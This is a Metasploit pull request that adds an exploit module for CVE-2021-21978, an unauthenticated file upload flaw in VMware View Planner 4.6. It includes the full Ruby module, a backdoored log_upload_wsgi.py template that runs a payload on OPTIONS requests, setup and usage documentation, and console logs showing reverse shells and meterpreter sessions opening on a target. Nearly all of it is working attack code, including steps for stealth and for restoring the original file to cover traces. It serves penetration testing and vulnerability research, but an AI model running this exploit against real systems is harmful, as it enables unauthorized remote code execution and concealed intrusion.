### PR TITLE
CVE-2021-21978 - VMWare View Planner Harness 4.6.x < 4.6 Security Patch 1 Arbitrary File Upload RCE

### DIFF
--- a/data/exploits/vmware_view_planner_4_6_uploadlog_rce/log_upload_wsgi.py
+++ b/data/exploits/vmware_view_planner_4_6_uploadlog_rce/log_upload_wsgi.py
@@ -91,7 +91,7 @@ def application(environ, start_response):
             logger.error("Exception {}".format(str(e)))
             body = u"Exception {}".format(str(e))
     elif environ['REQUEST_METHOD'] == 'OPTIONS':
-        os.system("PAYLOAD")
+        PAYLOAD
         body = u"Payload success!"
     else:
         logger.error("Invalid request")

--- a/data/exploits/vmware_view_planner_4_6_uploadlog_rce/log_upload_wsgi.py
+++ b/data/exploits/vmware_view_planner_4_6_uploadlog_rce/log_upload_wsgi.py
@@ -1,0 +1,107 @@
+#! /usr/bin/env python3
+import cgi
+import os,sys
+import logging
+import json
+
+WORKLOAD_LOG_ZIP_ARCHIVE_FILE_NAME = "workload_log_{}.zip"
+
+class LogFileJson:
+    """ Defines format to upload log file in harness
+
+    Arguments:
+    itrLogPath : log path provided by harness to store log data
+    logFileType : Type of log file defined in api.agentlogFileType
+    workloadID [OPTIONAL] : workload id, if log file is workload specific
+
+    """
+    def __init__(self, itrLogPath, logFileType, workloadID = None):
+        self.itrLogPath = itrLogPath
+        self.logFileType = logFileType
+        self.workloadID = workloadID
+
+    def to_json(self):
+        return json.dumps(self.__dict__)
+
+    @classmethod
+    def from_json(cls, json_str):
+        json_dict = json.loads(json_str)
+        return cls(**json_dict)
+
+class agentlogFileType():
+    """ Defines various log file types to be uploaded by agent
+
+    """
+    WORKLOAD_ZIP_LOG = "workloadLogsZipFile"
+
+try:
+    # TO DO: Puth path in some config
+    logging.basicConfig(filename="/etc/httpd/html/logs/uploader.log",filemode='a', level=logging.ERROR)
+except:
+    # In case write permission is not available in log folder.
+    pass
+
+logger = logging.getLogger('log_upload_wsgi.py')
+
+def application(environ, start_response):
+    logger.debug("application called")
+
+    if environ['REQUEST_METHOD'] == 'POST':
+        post = cgi.FieldStorage(
+            fp=environ['wsgi.input'],
+            environ=environ,
+            keep_blank_values=True
+        )
+        # TO DO: Puth path in some config or read from config is already available
+        resultBasePath = "/etc/httpd/html/vpresults"
+        try:
+            filedata = post["logfile"]
+            metaData = post["logMetaData"]
+
+            if metaData.value:
+                logFileJson = LogFileJson.from_json(metaData.value)
+
+            if not os.path.exists(os.path.join(resultBasePath, logFileJson.itrLogPath)):
+                os.makedirs(os.path.join(resultBasePath, logFileJson.itrLogPath))
+
+            if filedata.file:
+                if (logFileJson.logFileType == agentlogFileType.WORKLOAD_ZIP_LOG):
+                    filePath = os.path.join(resultBasePath, logFileJson.itrLogPath, WORKLOAD_LOG_ZIP_ARCHIVE_FILE_NAME.format(str(logFileJson.workloadID)))
+                else:
+                    filePath = os.path.join(resultBasePath, logFileJson.itrLogPath, logFileJson.logFileType)
+                with open(filePath, 'wb') as output_file:
+                    while True:
+                        data = filedata.file.read(1024)
+                        # End of file
+                        if not data:
+                            break
+                        output_file.write(data)
+
+                body = u" File uploaded successfully."
+                start_response(
+                    '200 OK',
+                    [
+                        ('Content-type', 'text/html; charset=utf8'),
+                        ('Content-Length', str(len(body))),
+                    ]
+                )
+                return [body.encode('utf8')]
+
+        except Exception as e:
+            logger.error("Exception {}".format(str(e)))
+            body = u"Exception {}".format(str(e))
+    elif environ['REQUEST_METHOD'] == 'OPTIONS':
+        os.system("PAYLOAD")
+        body = u"Payload success!"
+    else:
+        logger.error("Invalid request")
+        body = u"Invalid request"
+
+    start_response(
+        '400 fail',
+        [
+            ('Content-type', 'text/html; charset=utf8'),
+            ('Content-Length', str(len(body))),
+        ]
+    )
+    return [body.encode('utf8')]

--- a/data/exploits/vmware_view_planner_4_6_uploadlog_rce/log_upload_wsgi.py
+++ b/data/exploits/vmware_view_planner_4_6_uploadlog_rce/log_upload_wsgi.py
@@ -92,7 +92,7 @@ def application(environ, start_response):
             body = u"Exception {}".format(str(e))
     elif environ['REQUEST_METHOD'] == 'OPTIONS':
         PAYLOAD
-        body = u"Payload success!"
+        body = u"Invalid request"
     else:
         logger.error("Invalid request")
         body = u"Invalid request"

--- a/documentation/modules/exploit/linux/http/vmware_view_planner_4_6_uploadlog_rce.md
+++ b/documentation/modules/exploit/linux/http/vmware_view_planner_4_6_uploadlog_rce.md
@@ -1,0 +1,63 @@
+## Vulnerable Application
+VMWare View Planner 4.6 prior to 4.6 Security Patch 1 contained an log file upload script,
+named `log_upload_wsgi.py`, which was mapped on to the web page `/logupload` and available
+to unauthenticated users. Furthermore, unauthenticated users could browse the source code of
+this file by navigating to `/wsgi_log_upload/log_upload_wsgi.py`, giving them an easy way to
+ensure that they restored the original contents of the `log_upload_wsgi.py` file.
+
+The module takes advantage of these two properties to first obtain the contents of the
+`log_upload_wsgi.py` file and then overwrite it with a backdoored copy. Once a request has been
+sent to `/logupload` to trigger the payload, the original copy of `log_upload_wsgi.py` is then
+restored to ensure the target can continue its normal operations. Successful exploitation results
+in RCE as the `apache` user within the `appacheServer` Docker container.
+
+### Setup Steps
+
+1. Sign up for an account at https://my.vmware.com/web/vmware/registration
+1. Browse to https://my.vmware.com/web/vmware/downloads/details?downloadGroup=VIEW-PLAN-460&productId=1067&rPId=53394 and download the OVA file for View Planner Harness.
+1. Verify the name of the downloaded OVA is viewplanner-harness-4.6.0.0-16995088_OVF10.ova and its hash is 4639f1916ffd30095cf5af383f38f7de
+1. Install the VM and boot it up. When you get to the main screen, which will take several minutes, select Login with the arrow keys and log in with the username `root` and password `changeme`.
+1. Run `~/viewplanner/setup/harness_first_boot.sh` to start the server.
+1. Verify that the web server is accessible over port 80 or 443 and that the page at `/logupload` is accessible.
+
+## Verification Steps
+
+1. Install the server
+1. Start msfconsole
+1. Do: `use exploit/linux/http/vmware_view_planner_4_6_uploadlog_rce`
+1. Do: `set rhosts [Target IP]`
+1. Do: `set lhost [Local IP]`
+1. Do: `exploit`
+1. You should get a shell as the `apache` user on the target machine.
+1. You should also see that the original copy of `log_upload_wsgi.py` is restored after you get a shell.
+
+## Options
+
+## Scenarios
+
+### VMWare View Planner 4.6.0.0 OVA (viewplanner-harness-4.6.0.0-16995088_OVF10.ova)
+
+```
+msf6 > use exploit/linux/http/vmware_view_planner_4_6_uploadlog_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/vmware_view_planner_4_6_uploadlog_rce) > set RHOSTS 172.18.51.76
+RHOSTS => 172.18.51.76
+msf6 exploit(linux/http/vmware_view_planner_4_6_uploadlog_rce) > set LHOST 172.18.54.135
+LHOST => 172.18.54.135
+msf6 exploit(linux/http/vmware_view_planner_4_6_uploadlog_rce) > exploit
+
+[*] Started reverse TCP handler on 172.18.54.135:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable. Vulnerable log_upload_wsgi.py file identified!
+[*] Uploading backdoor to system via the arbitrary file upload vulnerability!
+[+] Backdoor uploaded!
+[*] Sending request to execute the backdoor!
+[*] Command shell session 1 opened (172.18.54.135:4444 -> 172.18.51.76:53274) at 2021-03-10 14:57:00 -0600
+[*] Reuploading the original code to remove the backdoor!
+[+] Original file restored, enjoy the shell!
+
+id
+uid=25(apache) gid=25(apache) groups=25(apache),
+uname -a
+Linux cf49e2261af4 4.9.137-1.ph2 #1-photon SMP Tue Nov 20 14:26:55 UTC 2018 x86_64
+```

--- a/documentation/modules/exploit/linux/http/vmware_view_planner_4_6_uploadlog_rce.md
+++ b/documentation/modules/exploit/linux/http/vmware_view_planner_4_6_uploadlog_rce.md
@@ -44,6 +44,34 @@ msf6 exploit(linux/http/vmware_view_planner_4_6_uploadlog_rce) > set RHOSTS 172.
 RHOSTS => 172.18.51.76
 msf6 exploit(linux/http/vmware_view_planner_4_6_uploadlog_rce) > set LHOST 172.18.54.135
 LHOST => 172.18.54.135
+msf6 exploit(linux/http/vmware_view_planner_4_6_uploadlog_rce) > show options
+
+Module options (exploit/linux/http/vmware_view_planner_4_6_uploadlog_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     172.18.51.76     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       Base path
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.18.54.135    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   VMware View Planner 4.6.0
+
 msf6 exploit(linux/http/vmware_view_planner_4_6_uploadlog_rce) > exploit
 
 [*] Started reverse TCP handler on 172.18.54.135:4444
@@ -52,12 +80,19 @@ msf6 exploit(linux/http/vmware_view_planner_4_6_uploadlog_rce) > exploit
 [*] Uploading backdoor to system via the arbitrary file upload vulnerability!
 [+] Backdoor uploaded!
 [*] Sending request to execute the backdoor!
-[*] Command shell session 1 opened (172.18.54.135:4444 -> 172.18.51.76:53274) at 2021-03-10 14:57:00 -0600
+[*] Sending stage (39344 bytes) to 172.18.51.76
 [*] Reuploading the original code to remove the backdoor!
 [+] Original file restored, enjoy the shell!
+[*] Meterpreter session 2 opened (172.18.54.135:4444 -> 172.18.51.76:53278) at 2021-03-10 16:34:37 -0600
 
-id
-uid=25(apache) gid=25(apache) groups=25(apache),
-uname -a
-Linux cf49e2261af4 4.9.137-1.ph2 #1-photon SMP Tue Nov 20 14:26:55 UTC 2018 x86_64
+meterpreter > getuid
+Server username: apache
+meterpreter > sysinfo
+Computer     : cf49e2261af4
+OS           : Linux 4.9.137-1.ph2 #1-photon SMP Tue Nov 20 14:26:55 UTC 2018
+Architecture : x64
+Meterpreter  : python/linux
+meterpreter > pwd
+/
+meterpreter >
 ```

--- a/modules/exploits/linux/http/vmware_view_planner_4_6_uploadlog_rce.rb
+++ b/modules/exploits/linux/http/vmware_view_planner_4_6_uploadlog_rce.rb
@@ -37,15 +37,15 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2021-03-02', # Vendor advisory
         'License' => MSF_LICENSE,
         'Privileged' => false,
-        'Platform' => 'unix',
+        'Platform' => 'python',
         'Targets' => [
           [
             'VMware View Planner 4.6.0',
             {
-              'Arch' => ARCH_CMD,
+              'Arch' => ARCH_PYTHON,
               'Type' => :linux_command,
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_bash' # Known good payload. Note that some bind payloads did not work during testing.
+                'PAYLOAD' => 'python/meterpreter/reverse_tcp'
               }
             }
           ],
@@ -113,7 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # with a backdoor section added to it, and then fill in the PAYLOAD placeholder
     # with the payload we want to execute.
     data_dir = File.join(Msf::Config.data_directory, 'exploits', shortname)
-    f_handle = File.open(File.join(data_dir, 'log_upload_wsgi.py'), 'r')
+    f_handle = File.open(File.join(data_dir, 'log_upload_wsgi.py'), 'rb')
     file_content = f_handle.read
     f_handle.close
 

--- a/modules/exploits/linux/http/vmware_view_planner_4_6_uploadlog_rce.rb
+++ b/modules/exploits/linux/http/vmware_view_planner_4_6_uploadlog_rce.rb
@@ -4,9 +4,7 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-
-  # "Shotgun" approach to writing JSP
-  Rank = ManualRanking
+  Rank = ExcellentRanking
 
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
@@ -96,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # As the code for both is the same, minus the content of the file, this is a generic function to handle that.
   def upload_file(content)
     mime = Rex::MIME::Message.new
-    mime.add_part(content, 'application/octet-stream', nil, 'form-data; name="logfile"; filename="log_upload_wsgi.py"')
+    mime.add_part(content, 'application/octet-stream', nil, "form-data; name=\"logfile\"; filename=\"#{Rex::Text.rand_text_alpha(20)}\"")
     mime.add_part('{"itrLogPath":"/etc/httpd/html/wsgi_log_upload","logFileType":"log_upload_wsgi.py"}', nil, nil, 'form-data; name="logMetaData"')
     res = send_request_cgi(
       'method' => 'POST',
@@ -105,40 +103,40 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => mime.to_s
     )
     unless res.to_s.include?('File uploaded successfully.')
-      fail_with(Failure::UnexpectedReply, "Target indicated that the file wasn't uploaded sucessfully!")
+      fail_with(Failure::UnexpectedReply, "Target indicated that the file wasn't uploaded successfully!")
     end
   end
 
   def exploit
-    # Here we want to grab our template file, taken from a clean install but
-    # with a backdoor section added to it, and then fill in the PAYLOAD placeholder
-    # with the payload we want to execute.
-    data_dir = File.join(Msf::Config.data_directory, 'exploits', shortname)
-    f_handle = File.open(File.join(data_dir, 'log_upload_wsgi.py'), 'rb')
-    file_content = f_handle.read
-    f_handle.close
+    begin
+      # Here we want to grab our template file, taken from a clean install but
+      # with a backdoor section added to it, and then fill in the PAYLOAD placeholder
+      # with the payload we want to execute.
+      data_dir = File.join(Msf::Config.data_directory, 'exploits', shortname)
+      file_content = File.read(File.join(data_dir, 'log_upload_wsgi.py'))
 
-    payload.encoded.gsub!(/"/, '\\"')
-    file_content['PAYLOAD'] = payload.encoded
+      payload.encoded.gsub!(/"/, '\\"')
+      file_content['PAYLOAD'] = payload.encoded
 
-    # Now that things are primed, upload the file to the target.
-    print_status('Uploading backdoor to system via the arbitrary file upload vulnerability!')
-    upload_file(file_content)
-    print_good('Backdoor uploaded!')
+      # Now that things are primed, upload the file to the target.
+      print_status('Uploading backdoor to system via the arbitrary file upload vulnerability!')
+      upload_file(file_content)
+      print_good('Backdoor uploaded!')
 
-    # Use the OPTIONS request to trigger the backdoor. Technically this
-    # could be any other method including invalid ones like BACKDOOR, but for
-    # the purposes of stealth lets use a legitimate one.
-    print_status('Sending request to execute the backdoor!')
-    send_request_cgi(
-      'method' => 'OPTIONS',
-      'uri' => normalize_uri(target_uri.path, 'logupload')
-    )
-
-    # At this point we should have our shell after waiting a few seconds,
-    # so lets now restore the original file so we don't leave anything behind.
-    print_status('Reuploading the original code to remove the backdoor!')
-    upload_file(@original_content)
-    print_good('Original file restored, enjoy the shell!')
+      # Use the OPTIONS request to trigger the backdoor. Technically this
+      # could be any other method including invalid ones like BACKDOOR, but for
+      # the purposes of stealth lets use a legitimate one.
+      print_status('Sending request to execute the backdoor!')
+      send_request_cgi(
+        'method' => 'OPTIONS',
+        'uri' => normalize_uri(target_uri.path, 'logupload')
+      )
+    ensure
+      # At this point we should have our shell after waiting a few seconds,
+      # so lets now restore the original file so we don't leave anything behind.
+      print_status('Reuploading the original code to remove the backdoor!')
+      upload_file(@original_content)
+      print_good('Original file restored, enjoy the shell!')
+    end
   end
 end

--- a/modules/exploits/linux/http/vmware_view_planner_4_6_uploadlog_rce.rb
+++ b/modules/exploits/linux/http/vmware_view_planner_4_6_uploadlog_rce.rb
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
           Security Patch 1.
 
           Successful exploitation will result in RCE as the apache user inside
-          the appacheServer docker container.
+          the appacheServer Docker container.
         },
         'Author' => [
           'Mikhail Klyuchnikov', # Discovery
@@ -32,7 +32,8 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'References' => [
           ['CVE', '2021-21978'],
-          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0003.html']
+          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0003.html'],
+          ['URL', 'https://attackerkb.com/assessments/fc456e03-adf5-409a-955a-8a4fb7e79ece'] # wvu's PoC
         ],
         'DisclosureDate' => '2021-03-02', # Vendor advisory
         'License' => MSF_LICENSE,

--- a/modules/exploits/linux/http/vmware_view_planner_4_6_uploadlog_rce.rb
+++ b/modules/exploits/linux/http/vmware_view_planner_4_6_uploadlog_rce.rb
@@ -126,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
     upload_file(file_content)
     print_good('Backdoor uploaded!')
 
-    # And then use the OPTIONS request to trigger the backdoor. Technically this
+    # Use the OPTIONS request to trigger the backdoor. Technically this
     # could be any other method including invalid ones like BACKDOOR, but for
     # the purposes of stealth lets use a legitimate one.
     print_status('Sending request to execute the backdoor!')

--- a/modules/exploits/linux/http/vmware_view_planner_4_6_uploadlog_rce.rb
+++ b/modules/exploits/linux/http/vmware_view_planner_4_6_uploadlog_rce.rb
@@ -1,0 +1,143 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  # "Shotgun" approach to writing JSP
+  Rank = ManualRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'VMware View Planner Unauthenticated Log File Upload RCE',
+        'Description' => %q{
+          This module exploits an unauthenticated log file upload within the
+          log_upload_wsgi.py file of VMWare View Planner 4.6 prior to 4.6
+          Security Patch 1.
+
+          Successful exploitation will result in RCE as the user apache inside
+          the Apache docker container.
+        },
+        'Author' => [
+          'Mikhail Klyuchnikov', # Discovery
+          'wvu', # Analysis and PoC
+          'Grant Willcox' # Metasploit Module
+        ],
+        'References' => [
+          ['CVE', '2021-21978'],
+          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0003.html']
+        ],
+        'DisclosureDate' => '2021-03-02', # Vendor advisory
+        'License' => MSF_LICENSE,
+        'Privileged' => false,
+        'Platform' => 'unix',
+        'Targets' => [
+          [
+            'VMware View Planner 4.6.0',
+            {
+              'Arch' => ARCH_CMD,
+              'Type' => :linux_command,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash' # Known good payload. Note that some bind payloads did not work during testing.
+              }
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(443),
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'wsgi_log_upload', 'log_upload_wsgi.py')
+    )
+
+    unless res
+      return CheckCode::Unknown('Target did not respond to check.')
+    end
+
+    unless res&.code == 200 && res&.body
+      return CheckCode::Safe('log_upload_wsgi.py file not found at the expected location.')
+    end
+
+    @original_content = res.body # If the server responded with the contents of log_upload_wsgi.py, lets save this for later restoration.
+
+    if res.body&.include?('import hashlib') && res.body&.include?('if hashlib.sha256(password.value.encode("utf8")).hexdigest()==secret_key:')
+      return CheckCode::Safe("Target's log_upload_wsgi.py file has been patched.")
+    end
+
+    CheckCode::Appears('Vulnerable log_upload_wsgi.py file identified!')
+  end
+
+  # We need to upload a file twice: once for uploading the backdoor, and once for restoring the original file.
+  # As the code for both is the same, minus the content of the file, this is a generic function to handle that.
+  def upload_file(content)
+    mime = Rex::MIME::Message.new
+    mime.add_part(content, 'application/octet-stream', nil, 'form-data; name="logfile"; filename="log_upload_wsgi.py"')
+    mime.add_part('{"itrLogPath":"/etc/httpd/html/wsgi_log_upload","logFileType":"log_upload_wsgi.py"}', nil, nil, 'form-data; name="logMetaData"')
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'logupload'),
+      'ctype' => "multipart/form-data; boundary=#{mime.bound}",
+      'data' => mime.to_s
+    )
+    unless res.to_s.include?('File uploaded successfully.')
+      fail_with(Failure::UnexpectedReply, "Target indicated that the file wasn't uploaded sucessfully!")
+    end
+  end
+
+  def exploit
+    # Here we want to grab our template file, taken from a clean install but
+    # with a backdoor section added to it, and then fill in the PAYLOAD placeholder
+    # with the payload we want to execute.
+    data_dir = File.join(Msf::Config.data_directory, 'exploits', shortname)
+    f_handle = File.open(File.join(data_dir, 'log_upload_wsgi.py'), 'r')
+    file_content = f_handle.read
+    f_handle.close
+
+    payload.encoded.gsub!(/"/, '\\"')
+    file_content['PAYLOAD'] = payload.encoded
+
+    # Now that things are primed, upload the file to the target.
+    print_status('Uploading backdoor to system via the arbitrary file upload vulnerability!')
+    upload_file(file_content)
+    print_good('Backdoor uploaded!')
+
+    # And then use the OPTIONS request to trigger the backdoor. Technically this
+    # could be any other method including invalid ones like BACKDOOR, but for
+    # the purposes of stealth lets use a legitimate one.
+    print_status('Sending request to execute the backdoor!')
+    send_request_cgi(
+      'method' => 'OPTIONS',
+      'uri' => normalize_uri(target_uri.path, 'logupload')
+    )
+
+    # At this point we should have our shell after waiting a few seconds,
+    # so lets now restore the original file so we don't leave anything behind.
+    print_status('Reuploading the original code to remove the backdoor!')
+    upload_file(@original_content)
+    print_good('Original file restored, enjoy the shell!')
+  end
+end

--- a/modules/exploits/linux/http/vmware_view_planner_4_6_uploadlog_rce.rb
+++ b/modules/exploits/linux/http/vmware_view_planner_4_6_uploadlog_rce.rb
@@ -108,35 +108,33 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    begin
-      # Here we want to grab our template file, taken from a clean install but
-      # with a backdoor section added to it, and then fill in the PAYLOAD placeholder
-      # with the payload we want to execute.
-      data_dir = File.join(Msf::Config.data_directory, 'exploits', shortname)
-      file_content = File.read(File.join(data_dir, 'log_upload_wsgi.py'))
+    # Here we want to grab our template file, taken from a clean install but
+    # with a backdoor section added to it, and then fill in the PAYLOAD placeholder
+    # with the payload we want to execute.
+    data_dir = File.join(Msf::Config.data_directory, 'exploits', shortname)
+    file_content = File.read(File.join(data_dir, 'log_upload_wsgi.py'))
 
-      payload.encoded.gsub!(/"/, '\\"')
-      file_content['PAYLOAD'] = payload.encoded
+    payload.encoded.gsub!(/"/, '\\"')
+    file_content['PAYLOAD'] = payload.encoded
 
-      # Now that things are primed, upload the file to the target.
-      print_status('Uploading backdoor to system via the arbitrary file upload vulnerability!')
-      upload_file(file_content)
-      print_good('Backdoor uploaded!')
+    # Now that things are primed, upload the file to the target.
+    print_status('Uploading backdoor to system via the arbitrary file upload vulnerability!')
+    upload_file(file_content)
+    print_good('Backdoor uploaded!')
 
-      # Use the OPTIONS request to trigger the backdoor. Technically this
-      # could be any other method including invalid ones like BACKDOOR, but for
-      # the purposes of stealth lets use a legitimate one.
-      print_status('Sending request to execute the backdoor!')
-      send_request_cgi(
-        'method' => 'OPTIONS',
-        'uri' => normalize_uri(target_uri.path, 'logupload')
-      )
-    ensure
-      # At this point we should have our shell after waiting a few seconds,
-      # so lets now restore the original file so we don't leave anything behind.
-      print_status('Reuploading the original code to remove the backdoor!')
-      upload_file(@original_content)
-      print_good('Original file restored, enjoy the shell!')
-    end
+    # Use the OPTIONS request to trigger the backdoor. Technically this
+    # could be any other method including invalid ones like BACKDOOR, but for
+    # the purposes of stealth lets use a legitimate one.
+    print_status('Sending request to execute the backdoor!')
+    send_request_cgi(
+      'method' => 'OPTIONS',
+      'uri' => normalize_uri(target_uri.path, 'logupload')
+    )
+  ensure
+    # At this point we should have our shell after waiting a few seconds,
+    # so lets now restore the original file so we don't leave anything behind.
+    print_status('Reuploading the original code to remove the backdoor!')
+    upload_file(@original_content)
+    print_good('Original file restored, enjoy the shell!')
   end
 end

--- a/modules/exploits/linux/http/vmware_view_planner_4_6_uploadlog_rce.rb
+++ b/modules/exploits/linux/http/vmware_view_planner_4_6_uploadlog_rce.rb
@@ -22,8 +22,8 @@ class MetasploitModule < Msf::Exploit::Remote
           log_upload_wsgi.py file of VMWare View Planner 4.6 prior to 4.6
           Security Patch 1.
 
-          Successful exploitation will result in RCE as the user apache inside
-          the Apache docker container.
+          Successful exploitation will result in RCE as the apache user inside
+          the appacheServer docker container.
         },
         'Author' => [
           'Mikhail Klyuchnikov', # Discovery

--- a/modules/exploits/linux/http/vmware_view_planner_4_6_uploadlog_rce.rb
+++ b/modules/exploits/linux/http/vmware_view_planner_4_6_uploadlog_rce.rb
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown('Target did not respond to check.')
     end
 
-    unless res&.code == 200 && res&.body
+    unless res.code == 200 && !res.body.empty?
       return CheckCode::Safe('log_upload_wsgi.py file not found at the expected location.')
     end
 


### PR DESCRIPTION
This PR adds support for exploiting CVE-2021-21978, an arbitrary file upload vulnerability within VMWare View Planner Harness prior to 4.6 Security Patch 1. Successful exploitation results in RCE as the `apache` user inside the `appacheServer` Docker container.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/linux/http/vmware_view_planner_4_6_uploadlog_rce`
- [x] `set RHOSTS *target IP*`
- [x] `set LHOSTS *local IP*`
- [x] `exploit`
- [x] **Verify** that you get a shell as `apache` and that the original `log_upload_wsgi.py` file is restored.
- [x] **Document** any issues encountered.
